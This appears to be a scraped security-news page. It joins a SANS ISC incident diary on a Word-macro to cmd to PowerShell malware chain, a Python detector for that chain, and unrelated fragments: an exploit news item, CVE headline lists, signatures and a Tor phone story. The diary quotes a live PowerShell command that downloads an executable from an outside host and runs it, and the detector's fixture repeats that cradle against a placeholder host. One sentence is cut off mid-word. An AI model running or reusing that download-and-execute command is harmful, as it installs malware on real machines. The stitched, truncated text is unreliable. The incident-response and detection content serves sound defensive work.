Recently we've seen lots of malicious documents make it through our first protection layers (https://www.virustotal.com/en/file/79ff976c5ca6025f3bb90ddfa7298286217c21309c897e6b530603d48dea0369/analysis/). In the last week, these emails have carried a Word document that spawns a command shell, which in turn kicks off a PowerShell script. When working incidents, it is important to map out the attacker lifecycle to determine where to improve your defenses.

In this case the execution chain looks like this: Email -> Word Doc -> cmd.exe -> PowerShell -> Malware.exe


When the user opens the attachment, it runs a macro that kicks off a command shell, which runs the following:
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.tessaban.com/images/images/gfjfgklmslifdsfnln.png','%TMP%\scsnsys.exe');Start-Process '%TMP%\scsnsys.exe'


When looking at how PowerShell makes the web connection, nothing special happens on the network. PowerShell doesn

So let's map out the controls we can put in place to break the attack lifecycle at each stage.

  1. Stopping delivery of the message (in order of $ and complexity)
    1. Hold the attachment for X hours so AV may catch up
    2. Convert the file to another type (e.g. Word -> PDF)
    3. Mangle the macro in the file before delivery
    4. Sandbox the attachment before delivery
  2. Preventing macros from running
    1. Disable macros via GPO
  3. Block users from cmd.exe
    1. Use an AppLocker policy to block cmd.exe
  4. Prevent PowerShell from running unsigned scripts
    1. Lots of ways to bypass
  5. Prevent download of the malware
    1. Use a sinkhole/proxy, etc.
  6. Prevent the malware from running in the drop location (C:\Users\me\AppData\Local\Temp\scsnsys.exe)
    1. AppLocker


Now, by looking at this list, you can determine what makes sense in your environment given your technical or political constraints. This exercise will have you prepared to answer the question "How can we prevent this in the future?" I also like to add a simple level of effort required to implement each change (e.g. ~10hrs) and its cost (e.g. $$$).
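As an added example (not part of Tom Webb's diary), the following Python script shows how the same attack lifecycle can be turned into detection logic run over process-creation telemetry: it rebuilds the parent/child lineage, flags each stage of the Email -> Word -> cmd.exe -> PowerShell -> Temp-drop chain, and maps every hit back to the control above that would have broken it. The events are constructed Sysmon-style records; the PIDs, image paths and download URL are placeholders, and only the dropped file name and Temp path mirror the diary.

```python
import re

# Process names that mark each stage of the chain described in the diary.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-cradle and Temp-drop patterns modelled on the diary's command line.
CRADLE_RE = re.compile(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", re.I)
TEMP_DROP_RE = re.compile(r"(%TMP%|%TEMP%|\\AppData\\Local\\Temp)\\[^\s'\"]+\.exe", re.I)
TEMP_IMAGE_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

# Which control from the diary's list breaks each detected stage.
CONTROLS = {
    "office-spawned-shell": "disable macros via GPO; AppLocker rule blocking cmd.exe for users",
    "download-cradle": "proxy/sinkhole the download; restrict unsigned PowerShell scripts",
    "temp-drop": "AppLocker rule denying execution from %TMP%",
    "exec-from-temp": "AppLocker rule denying execution from %TMP%",
    "full-chain": "sandbox, convert or mangle macro attachments before delivery",
}

# Constructed sample data (hypothetical): PIDs and the URL are placeholders.
PLACEHOLDER_URL = "http://malware.example.invalid/images/payload.png"
CRADLE = ("PowerShell (New-Object System.Net.WebClient).DownloadFile('" + PLACEHOLDER_URL
          + "','%TMP%\\scsnsys.exe');Start-Process '%TMP%\\scsnsys.exe'")
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\WINWORD.EXE" /n invoice.doc'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c " + CRADLE},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": CRADLE},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\me\AppData\Local\Temp\scsnsys.exe",
     "cmdline": r"C:\Users\me\AppData\Local\Temp\scsnsys.exe"},
    # Benign: an admin launching PowerShell from a shell with no download.
    {"pid": 500, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell Get-Process"},
]


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Image basenames from the process up through its ancestors (root last)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def classify(events):
    """Return one finding per event that matches at least one stage of the chain."""
    findings = []
    for e in events:
        chain = lineage(events, e["pid"])
        me, parent, ancestors = chain[0], (chain[1] if len(chain) > 1 else None), chain[1:]
        cmd = e["cmdline"]
        stages = []
        if me in SHELLS | POWERSHELL and parent in OFFICE:
            stages.append("office-spawned-shell")
        if me in SHELLS | POWERSHELL and CRADLE_RE.search(cmd):
            stages.append("download-cradle")
        if me in SHELLS | POWERSHELL and TEMP_DROP_RE.search(cmd):
            stages.append("temp-drop")
        if TEMP_IMAGE_RE.search(e["image"]):
            stages.append("exec-from-temp")
        if any(a in OFFICE for a in ancestors) and CRADLE_RE.search(cmd):
            stages.append("full-chain")
        if stages:
            findings.append({"pid": e["pid"], "image": me, "stages": stages,
                             "controls": sorted({CONTROLS[s] for s in stages})})
    return findings


def report(events):
    """Human-readable lines: one per finding, with the lineage and the breaking controls."""
    lines = []
    for f in classify(events):
        lines.append("pid %d %s <- %s | stages: %s | break with: %s" % (
            f["pid"], f["image"], " <- ".join(lineage(events, f["pid"])[1:]) or "(root)",
            ", ".join(f["stages"]), "; ".join(f["controls"])))
    return lines


if __name__ == "__main__":
    print("\n".join(report(EVENTS)))
```

The lineage walk is what separates this from a plain command-line grep: a PowerShell download cradle is interesting on its own, but a cradle whose ancestor is WINWORD.EXE is the macro-launched chain the diary describes, and the `controls` field tells you which item on the list would have stopped that stage.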

--

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 


[Screenshot: an exploit that takes full control of a fully updated version of Fedora. (credit: Chris Evans)]

Recently released exploit code makes people running fully patched versions of Fedora and other Linux distributions vulnerable to drive-by attacks that can install keyloggers, backdoors, and other types of malware, a security researcher says.

One of the exploits—which targets a memory corruption vulnerability in the GStreamer framework that by default ships with many mainstream Linux distributions—is also noteworthy for its elegance. To wit: it uses a rarely seen approach to defeat address space layout randomization and data execution prevention, which are two of the security protections built in to Linux to make software exploits harder to carry out. ASLR randomizes the locations in computer memory where software loads specific chunks of code. As a result, code that exploits existing flaws often results in a simple computer crash rather than a catastrophic system compromise. Meanwhile, DEP, which is often referred to as NX or No-Execute, blocks the execution of code that such exploits load into memory. (Ars Technology Editor Peter Bright has much more about ASLR and DEP here.)

Unlike most ASLR and DEP bypasses, the one folded into the GStreamer exploit doesn't rely on code to manipulate the memory layout or other environmental variables. Instead, it painstakingly arranges the bytes of code in a way that completely disables the protections. And by eliminating the need for JavaScript or other memory-massaging code to execute on a targeted computer, it's possible to carry out attacks that otherwise wouldn't be possible. Chris Evans, the security researcher who developed the exploit, describes the challenge as "a real beast."


 
Neovim CVE-2016-1248 Command Execution Vulnerability
 
Xen CVE-2016-9381 Privilege Escalation Vulnerability
 
Linux Kernel Out-Of-Bounds Read Information Disclosure Vulnerability
 
Xen Multiple Denial of Service Vulnerabilities
 
Xen PyGrub Multiple Privilege Escalation Vulnerabilities
 
Xen CVE-2016-9384 Information Disclosure Vulnerability
 
Xen CVE-2016-9383 Memory Corruption Vulnerability
 
TYPO3 Suggest Wizard Remote Security Bypass Vulnerability
 

Thanks to your help, we found an application that will display a ZIP comment by default: WinRAR.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
NVISO

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
[CORE-2016-0007] - TP-LINK TDDP Multiple Vulnerabilities
 


The Tor Project recently announced the release of its prototype for a Tor-enabled smartphone—an Android phone beefed up with privacy and security in mind, and intended as equal parts opsec kung fu and a gauntlet to Google.

The new phone, designed by Tor developer Mike Perry, is based on Copperhead OS, the hardened Android distribution profiled first by Ars earlier this year.

"The prototype is meant to show a possible direction for Tor on mobile," Perry wrote in a blog post. "We are trying to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users."


 
Poppler CVE-2015-8868 Heap Buffer Overflow Vulnerability
 
Expat CVE-2016-4472 Incomplete Fix Remote Code Execution Vulnerability
 
Google Android Multiple Kernel Components Multiple Information Disclosure Vulnerabilities
 
Linux Kernel 'sound/core/timer.c' Local Information Disclosure Vulnerability
 
Linux Kernel CVE-2016-4578 Multiple Local Information Disclosure Vulnerabilities
 
Linux Kernel CVE-2016-1583 Stack-Based Buffer Overflow Vulnerability
 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Quagga Routing Software Suite CVE-2016-4049 Denial Of Service Vulnerability
 
Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability
 
LibTIFF 'tools/tiffcrop.c' Multiple Heap Buffer Overflow Vulnerabilities
 
PHP CVE-2016-7418 Out-of-Bounds Read Denial of Service Vulnerability
 
PHP CVE-2016-7413 Use After Free Denial of Service Vulnerability
 
CVE-2015-0050: Microsoft Internet Explorer 8 MSHTML SRunPointer::SpanQualifier/RunType OOB read details
 
Mozilla Firefox Multiple Security Vulnerabilities
 
Moodle CVE-2016-8643 Security Bypass Vulnerability
 
Moodle CVE-2016-8644 Information Disclosure Vulnerability
 
Moodle MSA-16-0026 Information Disclosure Vulnerability
 
Xen CVE-2016-3159 Information Disclosure Vulnerability
 
QEMU 'stellaris_enet_receive()' Function Remote Buffer Overflow Vulnerability
 
Xen CVE-2016-3158 Information Disclosure Vulnerability
 
Internet Storm Center Infocon Status